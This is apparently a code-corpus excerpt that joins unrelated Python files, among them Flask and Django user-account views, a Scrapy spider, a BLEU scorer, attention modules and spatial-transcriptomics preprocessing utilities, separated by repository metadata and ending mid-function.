# internal factory helper that builds the Flask app
def create_flask_app(config_name):
    # create the Flask app object
    flask_app = Flask(__name__)
    # load configuration from the config class
    from app.settings.config import config_dict
    config_class = config_dict[config_name]
    flask_app.config.from_object(config_class)
    # load extra configuration from an environment variable
    from common.utils.constants import EXTRA_ENV_CONFIG
    flask_app.config.from_envvar(EXTRA_ENV_CONFIG, silent=True)
    return flask_app
# public factory function that creates the app
def create_app(config_name):
    # create the app object
    app = create_flask_app(config_name)
    # register extensions
    register_extensions(app)
    # register blueprints
    register_bp(app)
    return app
```
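A brief sketch of an entry point for the factory above. The `'development'` key and the run arguments are assumptions; the valid keys live in `app.settings.config.config_dict`, which is not shown here.
```python
# Hypothetical run script for the app factory above; the config key is an assumption.
from app import create_app

app = create_app('development')   # must be a key defined in config_dict

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000, debug=True)
```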
#### File: resource/user/user_followings.py
```python
from datetime import datetime
from flask import request, g
from flask_restful import Resource
from flask_restful.reqparse import RequestParser
from app import db
from common.models.user import User, Relation
from common.utils.decorators import login_required
class UserFollow(Resource):
method_decorators = {'post': [login_required]}
def post(self):
parser = RequestParser()
parser.add_argument('target', location='json', required=True, type=int)
args = parser.parse_args()
target = args.target
user_id = g.user_id
relation_ = Relation.query. \
filter(Relation.user_id == g.user_id, Relation.author_id == target,
Relation.relation == Relation.RELATION.FOLLOW).all()
relation__ = Relation.query. \
filter(Relation.user_id == g.user_id, Relation.author_id == target,
Relation.relation == Relation.RELATION.BLACKLIST).all()
relation___ = Relation.query. \
filter(Relation.user_id == g.user_id, Relation.author_id == target,
Relation.relation == Relation.RELATION.DELETE).all()
relation____ = Relation.query. \
filter(Relation.user_id == g.user_id, Relation.author_id == target).all()
        # if there is no existing FOLLOW relation, update the fan/following counts
if not relation_:
User.query. \
filter(User.id == target). \
update({'fans_count': User.fans_count + 1})
User.query. \
filter(User.id == user_id). \
update({'following_count': User.following_count + 1})
        # if no relation record exists at all, create one
if not relation____:
relation = Relation(user_id=g.user_id, author_id=target, update_time=datetime.now(),
relation=Relation.RELATION.FOLLOW)
db.session.add(relation)
else:
            return {'message': '已关注'}  # "already following"
        # a blacklist or deleted relation already exists
        if relation__ or relation___:
            # switch the relation back to FOLLOW
Relation.query. \
filter(Relation.user_id == g.user_id, Relation.author_id == target). \
update({'relation': Relation.RELATION.FOLLOW})
db.session.commit()
return {'target': target}
```
#### File: resource/user/user_info.py
```python
from flask_restful import Resource
from common.utils.decorators import login_required
class UserInfoResource(Resource):
method_decorators = {'get': [login_required]}
def get(self):
        # get the id of the logged-in user
from flask import g
user_id = g.user_id
from common.models.user import User
from sqlalchemy.orm import load_only
        # query the database using the current user's id
user_info = User.query. \
options(load_only(User.id, User.name, User.profile_photo, User.introduction, User.article_count,
User.following_count, User.fans_count)). \
filter(user_id == User.id).first()
return user_info.to_dict()
```
#### File: common/models/article.py
```python
from datetime import datetime
from app import db
class Channel(db.Model):
"""
    News channel
"""
__tablename__ = 'news_channel'
    id = db.Column(db.Integer, primary_key=True, doc='Channel ID')
    name = db.Column(db.String(30), doc='Channel name')
    is_default = db.Column(db.Boolean, default=False, doc='Whether this is a default channel')
def to_dict(self):
return {
'id': self.id,
'name': self.name
}
class UserChannel(db.Model):
"""
    User followed-channels table
"""
__tablename__ = 'news_user_channel'
    id = db.Column(db.Integer, primary_key=True, doc='Primary key ID')
    user_id = db.Column(db.Integer, doc='User ID')
    channel_id = db.Column(db.Integer, doc='Channel ID')
    sequence = db.Column(db.Integer, default=0, doc='Sequence number')
    is_deleted = db.Column(db.Boolean, default=False, doc='Whether deleted')
class Article(db.Model):
"""
    Article basic information table
"""
__tablename__ = 'news_article_basic'
class STATUS:
        DRAFT = 0  # draft
        UNREVIEWED = 1  # pending review
        APPROVED = 2  # approved
        FAILED = 3  # review failed
        DELETED = 4  # deleted
        BANNED = 5  # banned
    id = db.Column(db.Integer, primary_key=True, doc='Article ID')
    user_id = db.Column(db.Integer, doc='User ID')
    channel_id = db.Column(db.Integer, doc='Channel ID')
    title = db.Column(db.String(130), doc='Title')
    cover = db.Column(db.JSON, doc='Cover')
    ctime = db.Column(db.DateTime, default=datetime.now, doc='Creation time')
    status = db.Column(db.Integer, default=0, doc='Post status')
    comment_count = db.Column(db.Integer, default=0, doc='Comment count')
class ArticleContent(db.Model):
"""
    Article content table
"""
__tablename__ = 'news_article_content'
    article_id = db.Column(db.Integer, primary_key=True, doc='Article ID')
    content = db.Column(db.Text, doc='Post content')
```
#### File: common/utils/parser.py
```python
import re
import base64
import imghdr
from datetime import datetime
def email(email_str):
"""
    Validate the email address format
    :param email_str: str, the string to validate
:return: email_str
"""
if re.match(r'^([A-Za-z0-9_\-\.\u4e00-\u9fa5])+\@([A-Za-z0-9_\-\.])+\.([A-Za-z]{2,8})$', email_str):
return email_str
else:
raise ValueError('{} is not a valid email'.format(email_str))
def mobile(mobile_str):
"""
    Validate the mobile number format
    :param mobile_str: str, the string to validate
:return: mobile_str
"""
if re.match(r'^1[3-9]\d{9}$', mobile_str):
return mobile_str
else:
raise ValueError('{} is not a valid mobile'.format(mobile_str))
def id_number(value):
"""检查是否为身份证号"""
id_number_pattern = r'(^[1-9]\d{5}(18|19|([23]\d))\d{2}((0[1-9])|(10|11|12))(([0-2][1-9])|10|20|30|31)\d{3}[0-9Xx]$)|(^[1-9]\d{5}\d{2}((0[1-9])|(10|11|12))(([0-2][1-9])|10|20|30|31)\d{2}$)'
if re.match(id_number_pattern, value):
return value.upper()
else:
raise ValueError('Invalid id number.')
``` |
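These validators either return the cleaned value or raise `ValueError`, so they can be called directly or plugged into a flask-restful `RequestParser` as the `type=` callable (the latter is an assumption about how the project uses them). A short sketch:
```python
# Direct use of the validators above; the sample values are illustrative only.
from common.utils.parser import email, mobile

print(mobile('13812345678'))           # valid: returned unchanged
print(email('user@example.com'))       # valid: returned unchanged
try:
    mobile('12345')                    # malformed number
except ValueError as exc:
    print('rejected:', exc)
# Assumed usage with flask-restful:
# parser.add_argument('mobile', type=mobile, required=True, location='json')
```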
{
"source": "150619/meiduo_mall_project",
"score": 2
} |
#### File: apps/users/utils.py
```python
import re
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import JsonResponse
from apps.users.models import User
class AuthMobile(ModelBackend):
def authenticate(self, request, username=None, password=None, **kwargs):
try:
if re.match(r'^1[3-9]\d{9}$', username):
user = User.objects.get(mobile=username)
else:
user = User.objects.get(username=username)
except User.DoesNotExist:
return
if user and user.check_password(password):
return user
else:
return
class LoginRequiredJsonMixin(LoginRequiredMixin):
def handle_no_permission(self):
return JsonResponse({'code': 400, 'errmsg': '用户未登录'})
```
#### File: apps/users/views.py
```python
import json
import re
from django.contrib.auth import login, authenticate, logout
from django.http import JsonResponse
from django.views import View
from django_redis import get_redis_connection
from apps.users.models import User
from apps.users.utils import LoginRequiredJsonMixin
class RegisterName(View):
    # parse the path parameter
    def get(self, request, username):
        # query the database
        count = User.objects.filter(username=username).count()
        return JsonResponse({'code': '0', 'errmsg': 'ok', 'count': count})
class RegisterMobile(View):
    def get(self, request, mobile):
        # query the database
        count = User.objects.filter(mobile=mobile).count()
        return JsonResponse({'code': '0', 'errmsg': 'ok', 'count': count})
class Register(View):
    def post(self, request):
        # parse the request body parameters
# json_bytes = request.body
# json_str = json_bytes.decode()
json_dict = json.loads(request.body)
        # get username
        username = json_dict.get('username')
        # get password and password2
        password = json_dict.get('password')
        password2 = json_dict.get('password2')
        # get mobile
        mobile = json_dict.get('mobile')
        # get sms_code
        sms_code = json_dict.get('sms_code')
        # get allow
        allow = json_dict.get('allow')
        # check that all required parameters are present; allow is not validated here
if not all([username, password, password2, mobile, sms_code]):
return JsonResponse({'code': '400', 'errmsg': '缺少必传参数'})
        # validate the username format
        if not re.match(r'[a-zA-Z0-9_-]{5,20}', username):
            return JsonResponse({'code': '400', 'errmsg': '用户名格式错误'})
        # check whether the username already exists in the database
        count = User.objects.filter(username=username).count()
        # return an error code if it already exists
        if count > 0:
            return JsonResponse({'code': '400', 'errmsg': '用户名已存在'})
        # validate the password format
        if not re.match(r'^[a-zA-Z0-9]{8,20}$', password):
            return JsonResponse({'code': '400', 'errmsg': '密码格式错误'})
        # check that password and password2 match; return an error code if not
if password != password2:
return JsonResponse({'code': '400', 'errmsg': '两次输入的密码不一致'})
        # validate the mobile number format
        if not re.match(r'1[3-9]\d{9}', mobile):
            return JsonResponse({'code': '400', 'errmsg': '手机号格式不正确'})
        # check whether the mobile number already exists
        count = User.objects.filter(mobile=mobile).count()
        if count > 0:
            return JsonResponse({'code': '400', 'errmsg': '手机号已存在'})
        # compare against the SMS verification code stored in redis
        redis_connect = get_redis_connection('verify_code')
        real_sms_code_b = redis_connect.get(f'{mobile}')
        # check whether the SMS code in redis has expired
        if real_sms_code_b:
            real_sms_code = real_sms_code_b.decode()
            # return an error code if the codes do not match
            if real_sms_code != sms_code:
                return JsonResponse({'code': '400', 'errmsg': '短信验证码错误'})
        else:
            return JsonResponse({'code': '400', 'errmsg': '短信验证码不存在或已过期,请重新获取'})
        # return an error code if the user did not agree to the terms
        if not allow:
            return JsonResponse({'code': '400', 'errmsg': '请同意用户协议'})
        # save the data; calling create() directly would store a plain-text password and break authenticate()
        # user = User.objects.create(username=username, password=password, mobile=mobile)
        user = User.objects.create_user(username=username, password=password, mobile=mobile)
        # keep the user logged in
        login(request, user)
        response = JsonResponse({'code': '0', 'errmsg': 'ok'})
        response.set_cookie('username', user.username, max_age=3600 * 24 * 14)
return response
class Login(View):
def post(self, request):
json_dict = json.loads(request.body)
        # get the parameters
        username = json_dict.get('username')
        password = json_dict.get('password')
        remembered = json_dict.get('remembered')
        # check that the required parameters exist; remembered is not validated
        if not all([username, password]):
            return JsonResponse({'code': 400, 'errmsg': '缺少必传参数'})
        # fetching with filter() returns a QuerySet, which is awkward for login-state handling
        # user = User.objects.filter(username=username, password=password)
        # check whether the entered account is a mobile number
        # if re.match(r'^1[3-9]\d{9}$', username):
        #     set USERNAME_FIELD to the mobile field
        #     User.USERNAME_FIELD = 'mobile'
        # else:
        #     set USERNAME_FIELD to the username field
        #     User.USERNAME_FIELD = 'username'
        # verify the username and password
        user = authenticate(request=None, username=username, password=password)
        if not user:
            return JsonResponse({'code': 400, 'errmsg': '用户名或密码错误'})
        # keep the user logged in
        login(request, user)
        if remembered:
            request.session.set_expiry(None)
        else:
            request.session.set_expiry(0)
        # set a cookie so the front end can read and display the username
response = JsonResponse({'code': 0, 'errmsg': 'ok'})
response.set_cookie('username', user.username, max_age=3600 * 24 * 14)
return response
class Logout(View):
def delete(self, request):
logout(request)
response = JsonResponse({'code': 0, 'errmsg': 'ok'})
response.delete_cookie('username')
return response
class UserInfo(LoginRequiredJsonMixin, View):
def get(self, request):
        # user is the authenticated user object taken from the request
user = request.user
return JsonResponse({
'code': 0,
'errmsg': 'ok',
"info_data": {
"username": user.username,
"mobile": user.mobile,
"email": user.email,
# "email_active": user.email_active,
}
})
``` |
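For orientation, a hedged sketch of the URL configuration these class-based views imply. Every path and pattern below is a guess for illustration; the project's actual `urls.py` is not part of this file.
```python
# Hypothetical apps/users/urls.py for the views above; all routes are assumptions.
from django.urls import path, re_path
from apps.users import views

urlpatterns = [
    re_path(r'^usernames/(?P<username>[a-zA-Z0-9_-]{5,20})/count/$', views.RegisterName.as_view()),
    re_path(r'^mobiles/(?P<mobile>1[3-9]\d{9})/count/$', views.RegisterMobile.as_view()),
    path('register/', views.Register.as_view()),
    path('login/', views.Login.as_view()),
    path('logout/', views.Logout.as_view()),
    path('info/', views.UserInfo.as_view()),
]
```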
{
"source": "150619/spider_project",
"score": 3
} |
#### File: spider_boy/spiders/itcast.py
```python
import scrapy
# time = //div[@class="masonry_date_block"]
class ItcastSpider(scrapy.Spider):
name = 'itcast'
allowed_domains = ['netflav.com']
start_urls = ['http://netflav.com/all']
def parse(self, response):
# name = response.xpath('//div')
name = response.xpath('//div[@class="masonry_title_block"]')
print('#' * 30)
# print(type(response))
# print(type(name))
# print(response.text)
print(name)
print('#' * 30)
``` |
{
"source": "1506607292/loremsurvey",
"score": 4
} |
#### File: loremsurvey/tests/tests.py
```python
class TClassStatic(object):
obj_num = 0
def __init__(self, data):
self.data = data
TClassStatic.obj_num += 1
def printself(self):
print("self.data: ", self.data)
@staticmethod
def smethod():
print("the number of obj is : ", TClassStatic.obj_num)
@classmethod
def cmethod(cls):
print("cmethod : ", cls.obj_num)
print(';first')
cls.smethod()
print('last')
def main():
objA = TClassStatic(10)
objB = TClassStatic(12)
objA.printself()
objB.printself()
objA.smethod()
objB.cmethod()
print("------------------------------")
TClassStatic.smethod()
TClassStatic.cmethod()
if __name__ == "__main__":
main()
``` |
{
"source": "1509098778/wukong-robot",
"score": 3
} |
#### File: robot/sdk/AbstractPlugin.py
```python
from abc import ABCMeta, abstractmethod
class AbstractPlugin(metaclass=ABCMeta):
""" 技能插件基类 """
SLUG = 'AbstractPlugin'
IS_IMMERSIVE = False
def __init__(self, con):
if self.IS_IMMERSIVE is not None:
self.isImmersive = self.IS_IMMERSIVE
else:
self.isImmersive = False
self.priority = 0
self.con = con
self.nlu = self.con.nlu
def play(self, src, delete=False, onCompleted=None, volume=1):
self.con.play(src, delete, onCompleted, volume)
def say(self, text, cache=False, onCompleted=None):
self.con.say(text, cache=cache, plugin=self.SLUG, onCompleted=onCompleted)
def activeListen(self):
return self.con.activeListen()
def clearImmersive(self):
self.con.setImmersiveMode(None)
@abstractmethod
def isValid(self, query, parsed):
"""
        Whether this plugin is suitable for handling the query
        Args:
            query -- the user's command string
            parsed -- the NLU parsing result of the user's command
        Returns:
            True: this plugin should handle it
            False: this plugin should not handle it
"""
return False
@abstractmethod
def handle(self, query, parsed):
"""
        Handling logic
        Args:
            query -- the user's command string
            parsed -- the NLU parsing result of the user's command
"""
pass
def isValidImmersive(self, query, parsed):
"""
        Whether this plugin should handle the query in immersive mode.
        Only applies to plugins that have an immersive mode (e.g. music).
        When the user wakes the device, a larger command set can be answered,
        e.g. "previous track", "next track", and so on.
"""
return False
def restore(self):
"""
        Restore the current plugin.
        Only applies to plugins that have an immersive mode (e.g. music).
        After an accidental wake-up, or a wake-up used for casual chat,
        the plugin's handling logic can be resumed automatically.
"""
return
``` |
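A minimal concrete plugin sketched against the abstract base above. Only the `SLUG`/`IS_IMMERSIVE` attributes and the `isValid`/`handle` hooks come from the source; the keyword check and the spoken reply are made up for illustration.
```python
# Hypothetical wukong-robot skill built on AbstractPlugin; keyword and reply are illustrative.
from robot.sdk.AbstractPlugin import AbstractPlugin

class Plugin(AbstractPlugin):
    SLUG = 'hello_demo'          # made-up slug
    IS_IMMERSIVE = False

    def isValid(self, query, parsed):
        # claim the query when it contains a made-up keyword
        return 'hello' in query.lower()

    def handle(self, query, parsed):
        # answer through the conversation object provided to the base class
        self.say('Hello! This is a demo plugin.', cache=True)
```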
{
"source": "15091444119/MASS",
"score": 3
} |
#### File: MASS/MASS-unsupNMT/filter_noisy_data.py
```python
import re
import argparse
from langdetect import detect
from polyglot.detect import Detector
def get_parser():
parser = argparse.ArgumentParser(description="Remove noisy data")
parser.add_argument("--input", type=str,
help="The path of input file")
parser.add_argument("--lang", type=str,
help="The language of input file")
parser.add_argument("--output", type=str, default=None,
help="The path of output file")
return parser
def detect_exist_url(text):
urls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', text)
url1 = re.findall('http[s]?//(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', text)
return len(urls) > 0 or len(url1) > 0
def detect_lang(text, lang):
try:
for i, l in enumerate(Detector(text, quiet=True).languages):
if l.code == lang and i == 0:
return True
if detect(text) == lang:
return True
return False
except:
return False
def main():
parser = get_parser()
args = parser.parse_args()
count = 0
allcount = 0
f = None
if args.output is not None:
f = open(args.output, 'w')
with open(args.input, encoding='utf-8') as input_file:
for line in input_file:
allcount += 1
line = line.strip()
if detect_exist_url(line) is False:
if detect_lang(line, args.lang) is True:
count += 1
if args.output is not None:
f.write(line + '\n')
#print(line)
if allcount % 1000000 == 0:
print("{} sentences processed".format(allcount), count)
print(count, allcount)
if __name__ == "__main__":
main()
``` |
{
"source": "15091444119/NJUNMT-pytorch",
"score": 2
} |
#### File: src/metric/bleu_scorer.py
```python
import os
import subprocess
from subprocess import DEVNULL
__all__ = [
'SacreBLEUScorer'
]
DETRUECASE_PL = os.path.join(os.path.dirname(__file__), "scripts/recaser/detruecase.perl")
DETOKENIZE_PL = os.path.join(os.path.dirname(__file__), "scripts/tokenizer/detokenizer.perl")
ZH_TOKENIZER_PY = os.path.join(os.path.dirname(__file__), "scripts/tokenizer/tokenizeChinese.py")
class SacreBLEUScorer(object):
"""Evaluate translation using external scripts.
Scripts are mainly from moses for post-processing and BLEU computation
"""
def __init__(self, reference_path, lang_pair, sacrebleu_args=None, postprocess=False, num_refs=1, test_set=None):
"""Initialize Scorer
Args:
reference_path: Path to reference files. If there are multiple reference files, such as
'ref.0', 'ref.1', ..., 'ref.n', just pass a 'ref.'
            lang_pair: Language pair of the translation, e.g. 'en-de' or 'zh-en'.
            sacrebleu_args: Extra arguments passed through to the sacrebleu command line.
            num_refs: Number of reference files.
            postprocess: Whether to do post-processing (detruecasing and detokenization)
                before computing BLEU.
            test_set: Name of a sacrebleu built-in test set to use instead of local references.
"""
self.lang_pair = lang_pair.lower()
self.reference_path = reference_path
self.num_refs = num_refs
if sacrebleu_args is None:
self.sacrebleu_args = []
else:
self.sacrebleu_args = sacrebleu_args.strip().split()
if num_refs == 1:
self.references = [self.reference_path,]
else:
self.references = ["{0}{1}".format(self.reference_path, ii) for ii in range(self.num_refs)]
        self.src_lang, self.tgt_lang = self.lang_pair.split("-")
self.postprocess = postprocess
self.test_set = test_set
def _postprocess_cmd(self, stdin):
cmd_detrucase = subprocess.Popen(["perl", DETRUECASE_PL], stdin=stdin, stdout=subprocess.PIPE, stderr=DEVNULL)
cmd_postprocess = subprocess.Popen(["perl", DETOKENIZE_PL, "-q", "-l", self.tgt_lang],
stdin=cmd_detrucase.stdout, stdout=subprocess.PIPE, stderr=DEVNULL)
return cmd_postprocess
def _compute_bleu(self, stdin):
sacrebleu_cmd = ["sacrebleu", "-l", self.lang_pair] + self.sacrebleu_args + ["--score-only", ]
if self.test_set is not None:
sacrebleu_cmd += ['--test-set', ] + [self.test_set]
else:
sacrebleu_cmd += self.references
cmd_bleu = subprocess.Popen(["sacrebleu", "-l", self.lang_pair] + self.sacrebleu_args + ["--score-only",] + self.references,
stdin=stdin,
stdout=subprocess.PIPE
)
bleu = cmd_bleu.communicate()[0].decode("utf-8").strip()
try:
bleu = float(bleu)
except:
print(type(bleu))
print(bleu)
exit(1)
return bleu
def corpus_bleu(self, hyp_in):
if self.postprocess:
cmd_postprocess = self._postprocess_cmd(stdin=hyp_in)
inp = cmd_postprocess.stdout
else:
inp = hyp_in
bleu = self._compute_bleu(stdin=inp)
return bleu
```
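A minimal usage sketch for the scorer above (not part of the repository; the reference path, hypothesis file, and language pair below are placeholders):

```python
# Hypothetical usage; the paths and language pair are assumptions, not from the repo.
scorer = SacreBLEUScorer(reference_path="data/newstest.ref", lang_pair="en-de", num_refs=1)
with open("hyp.detok.txt") as hyp_in:
    print(scorer.corpus_bleu(hyp_in))  # prints the corpus-level BLEU as a float
```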
#### File: src/modules/attention.py
```python
import torch
import torch.nn as nn
# from torch.autograd import Variable
import src.utils.init as my_init
from .basic import BottleSoftmax
class ScaledDotProductAttention(nn.Module):
''' Scaled Dot-Product Attention '''
def __init__(self, d_model, attn_dropout=0.1):
super(ScaledDotProductAttention, self).__init__()
self.temper = d_model ** 0.5
self.dropout = nn.Dropout(attn_dropout)
self.softmax = BottleSoftmax(dim=1)
def forward(self, q, k, v, attn_mask=None):
"""
:type attn_mask: torch.FloatTensor
:param attn_mask: Mask of the attention.
3D tensor with shape [batch_size, time_step_key, time_step_value]
"""
attn = torch.bmm(q, k.transpose(1, 2)) / self.temper
if attn_mask is not None:
assert attn_mask.size() == attn.size(), \
'Attention mask shape {} mismatch ' \
'with Attention logit tensor shape ' \
'{}.'.format(attn_mask.size(), attn.size())
attn = attn.masked_fill(attn_mask, -1e18)
attn = self.softmax(attn)
attn = self.dropout(attn)
output = torch.bmm(attn, v)
return output, attn
class BahdanauAttention(nn.Module):
def __init__(self, query_size, key_size, hidden_size=None):
super().__init__()
self.query_size = query_size
self.key_size = key_size
if hidden_size is None:
hidden_size = key_size
self.hidden_size = hidden_size
self.linear_key = nn.Linear(in_features=self.key_size, out_features=self.hidden_size)
self.linear_query = nn.Linear(in_features=self.query_size, out_features=self.hidden_size)
self.linear_logit = nn.Linear(in_features=self.hidden_size, out_features=1)
self.softmax = BottleSoftmax(dim=1)
self.tanh = nn.Tanh()
self._reset_parameters()
def _reset_parameters(self):
for weight in self.parameters():
my_init.default_init(weight)
def compute_cache(self, memory):
return self.linear_key(memory)
def forward(self, query, memory, cache=None, mask=None):
"""
        :param query: Query tensor.
with shape [batch_size, input_size]
:param memory: Memory tensor.
with shape [batch_size, mem_len, input_size]
        :param mask: Memory mask in which PAD positions are marked with True.
with shape [batch_size, mem_len]
"""
if query.dim() == 2:
query = query.unsqueeze(1)
one_step = True
else:
one_step = False
batch_size, q_len, q_size = query.size()
_, m_len, m_size = memory.size()
        q = self.linear_query(query.view(-1, q_size)) # [batch_size * q_len, hidden_size]
if cache is not None:
k = cache
else:
            k = self.linear_key(memory.view(-1, m_size)) # [batch_size * m_len, hidden_size]
# logit = q.unsqueeze(0) + k # [mem_len, batch_size, dim]
logits = q.view(batch_size, q_len, 1, -1) + k.view(batch_size, 1, m_len, -1)
logits = self.tanh(logits)
logits = self.linear_logit(logits.view(-1, self.hidden_size)).view(batch_size, q_len, m_len)
if mask is not None:
mask_ = mask.unsqueeze(1) # [batch_size, 1, m_len]
logits = logits.masked_fill(mask_, -1e18)
weights = self.softmax(logits) # [batch_size, q_len, m_len]
# [batch_size, q_len, m_len] @ [batch_size, m_len, m_size]
# ==> [batch_size, q_len, m_size]
attns = torch.bmm(weights, memory)
if one_step:
            attns = attns.squeeze(1) # ==> [batch_size, m_size]
return attns, weights
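if __name__ == "__main__":
    # Illustrative smoke test, not part of the original file; run it inside the package
    # so that the relative imports above resolve. All shapes below are assumptions.
    q = torch.randn(2, 4, 16)   # [batch, query_len, d_model]
    k = torch.randn(2, 6, 16)   # [batch, key_len, d_model]
    v = torch.randn(2, 6, 16)   # [batch, key_len, d_model]
    attention = ScaledDotProductAttention(d_model=16)
    out, weights = attention(q, k, v)
    print(out.size(), weights.size())  # expected: [2, 4, 16] and [2, 4, 6]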
``` |
{
"source": "15101538237ren/spatial-constrained-clustering-and-pseudotime",
"score": 2
} |
#### File: python_codes/util/util.py
```python
import os
import torch
import gudhi
import anndata
import numpy as np
import scanpy as sc
import squidpy as sq
import pandas as pd
import networkx as nx
from scipy.sparse import save_npz, load_npz
from scipy.spatial import distance
from sklearn.neighbors import kneighbors_graph
def mkdir(dir_path):
if not os.path.exists(dir_path):
os.makedirs(dir_path)
def load_ST_file(file_fold, count_file='filtered_feature_bc_matrix.h5', load_images=True, file_Adj=None):
adata_h5 = sc.read_visium(file_fold, load_images=load_images, count_file=count_file)
adata_h5.var_names_make_unique()
if load_images is False:
if file_Adj is None:
file_Adj = os.path.join(file_fold, "spatial/tissue_positions_list.csv")
positions = pd.read_csv(file_Adj, header=None)
positions.columns = [
'barcode',
'in_tissue',
'array_row',
'array_col',
'pxl_col_in_fullres',
'pxl_row_in_fullres',
]
positions.index = positions['barcode']
adata_h5.obs = adata_h5.obs.join(positions, how="left")
adata_h5.obsm['spatial'] = adata_h5.obs[['pxl_row_in_fullres', 'pxl_col_in_fullres']].to_numpy()
adata_h5.obs.drop(columns=['barcode', 'pxl_row_in_fullres', 'pxl_col_in_fullres'], inplace=True)
print('adata: (' + str(adata_h5.shape[0]) + ', ' + str(adata_h5.shape[1]) + ')')
sc.pp.filter_genes(adata_h5, min_cells=3)
return adata_h5
def load_DLPFC_data(args, sample_name, v2=True):
if v2 and sample_name != '151675':
file_fold = f'{args.dataset_dir}/DLPFC_v2/{sample_name}'
adata = sc.read_10x_mtx(file_fold)
adata.obsm['spatial'] = pd.read_csv(f"{file_fold}/spatial_coords.csv").values.astype(float)
sc.pp.filter_genes(adata, min_cells=3)
else:
file_fold = f'{args.dataset_dir}/DLPFC/{sample_name}'
adata = load_ST_file(file_fold=file_fold)
return adata
def load_slideseqv2_data():
adata = sq.datasets.slideseqv2()
sc.pp.filter_genes(adata, min_cells=3)
return adata
def load_seqfish_mouse_data():
adata = sq.datasets.seqfish()
sc.pp.filter_genes(adata, min_cells=3)
return adata
def load_visium_data(args, dataset):
adata = sc.datasets.visium_sge(dataset, include_hires_tiff=False)
sc.pp.filter_genes(adata, min_cells=3)
return adata
def load_stereo_seq_data(args):
file_fold = f'{args.dataset_dir}/stereo_seq'
adata = sc.read_csv(f"{file_fold}/RNA_counts.tsv", delimiter='\t', first_column_names=True)
coords = pd.read_csv(f"{file_fold}/position.tsv", delimiter='\t').values.astype(float)
adata = adata.transpose()[:, 1:]
adata.obsm["spatial"] = coords[:, :2]
sc.pp.filter_cells(adata, min_genes=100)
sc.pp.filter_genes(adata, min_cells=3)
return adata
def load_datasets(args, dataset):
if dataset == "slideseq_v2":
return load_slideseqv2_data()
elif dataset == "seqfish_mouse":
return load_seqfish_mouse_data()
else:
return load_stereo_seq_data(args)
def load_chicken_data(args, sample_name):
file_fold = f'{args.dataset_dir}/Visium/Chicken_Dev/ST/{sample_name}'
adata = load_ST_file(file_fold=file_fold)
return adata
def load_breast_cancer_data(args, sample_name):
base_dir = f"{args.dataset_dir}/Visium/Breast_Cancer"
count_fp = f'{base_dir}/ST-cnts/{sample_name}.tsv'
adata = sc.read_csv(count_fp, delimiter='\t', first_column_names=True)
coord_fp = f'{base_dir}/ST-spotfiles/{sample_name}_selection.tsv'
coord_df = pd.read_csv(coord_fp, delimiter='\t')
spots_idx_dicts = {f"{item[0]}x{item[1]}" : idx for idx, item in enumerate(coord_df[["x", "y"]].values.astype(int))}
spots_selected = np.array([sid for sid, spot in enumerate(list(adata.obs_names)) if spot in spots_idx_dicts]).astype(int)
coords = coord_df[["pixel_x", "pixel_y"]].values
adata.obsm["spatial"] = np.array([coords[spots_idx_dicts[spot]] for spot in adata.obs_names])
adata = adata[spots_selected, :]
coord_df = coord_df.iloc[spots_selected, :]
spots_idx_dicts = {f"{item[0]}x{item[1]}": idx for idx, item in enumerate(coord_df[["x", "y"]].values.astype(int))}
return adata, spots_idx_dicts
def load_preprocessed_data(args, dataset, sample_name, sedr=False):
data_root = f'{args.dataset_dir}/{dataset}/{sample_name}/preprocessed'
mkdir(data_root)
suffix = "-sedr" if sedr else ""
adata = anndata.read_h5ad(f'{data_root}/adata{suffix}.h5ad')
spatial_graph = load_npz(f'{data_root}/spatial_graph{suffix}.npz')
print(f"Readed Preprocessed Data of {dataset}!")
return adata, spatial_graph
def save_preprocessed_data(args, dataset, sample_name, adata, spatial_graph, sedr=False):
data_root = f'{args.dataset_dir}/{dataset}/{sample_name}/preprocessed'
mkdir(data_root)
suffix = "-sedr" if sedr else ""
adata.write(f'{data_root}/adata{suffix}.h5ad')
save_npz(f'{data_root}/spatial_graph{suffix}.npz', spatial_graph)
print(f"Saved Preprocessed Data of {dataset}!")
def preprocessing_data(args, adata, n_top_genes=None):
sc.pp.normalize_total(adata, target_sum=1e4)
sc.pp.log1p(adata)
sc.pp.highly_variable_genes(adata, n_top_genes=n_top_genes, flavor='cell_ranger', subset=True)
sc.pp.pca(adata)
coords = adata.obsm['spatial']
cut = estimate_cutoff_knn(coords, k=args.n_neighbors_for_knn_graph)
spatial_graph = graph_alpha(coords, cut=cut, n_layer=args.alpha_n_layer)
print('adata after filtered: (' + str(adata.shape[0]) + ', ' + str(adata.shape[1]) + ')')
return adata, spatial_graph
def preprocessing_data_sedr(args, adata, min_cells=3, pca_n_comps=300):
sc.pp.filter_genes(adata, min_cells=min_cells)
sc.pp.normalize_total(adata, target_sum=1, exclude_highly_expressed=True)
sc.pp.scale(adata)
sc.pp.pca(adata, n_comps=pca_n_comps)
coords = adata.obsm['spatial']
# cut = estimate_cutoff_knn(coords, k=args.n_neighbors_for_knn_graph)
# spatial_graph = graph_alpha(coords, cut=cut, n_layer=args.alpha_n_layer)
print('adata after filtered: (' + str(adata.shape[0]) + ', ' + str(adata.shape[1]) + ')')
return adata
def estimate_cutoff_knn(pts, k=10):
A_knn = kneighbors_graph(pts, n_neighbors=k, mode='distance')
est_cut = A_knn.sum() / float(A_knn.count_nonzero())
return est_cut
def graph_alpha(pts, n_layer=1, cut=np.inf):
# Get a graph from alpha shape
pts_list = pts.tolist()
n_node = len(pts_list)
alpha_complex = gudhi.AlphaComplex(points=pts_list)
simplex_tree = alpha_complex.create_simplex_tree(max_alpha_square=cut ** 2)
skeleton = simplex_tree.get_skeleton(1)
initial_graph = nx.Graph()
initial_graph.add_nodes_from([i for i in range(n_node)])
for s in skeleton:
if len(s[0]) == 2:
initial_graph.add_edge(s[0][0], s[0][1])
# Extend the graph for the specified layers
extended_graph = nx.Graph()
extended_graph.add_nodes_from(initial_graph)
extended_graph.add_edges_from(initial_graph.edges)
if n_layer == 2:
for i in range(n_node):
for j in initial_graph.neighbors(i):
for k in initial_graph.neighbors(j):
extended_graph.add_edge(i, k)
elif n_layer == 3:
for i in range(n_node):
for j in initial_graph.neighbors(i):
for k in initial_graph.neighbors(j):
for l in initial_graph.neighbors(k):
extended_graph.add_edge(i, l)
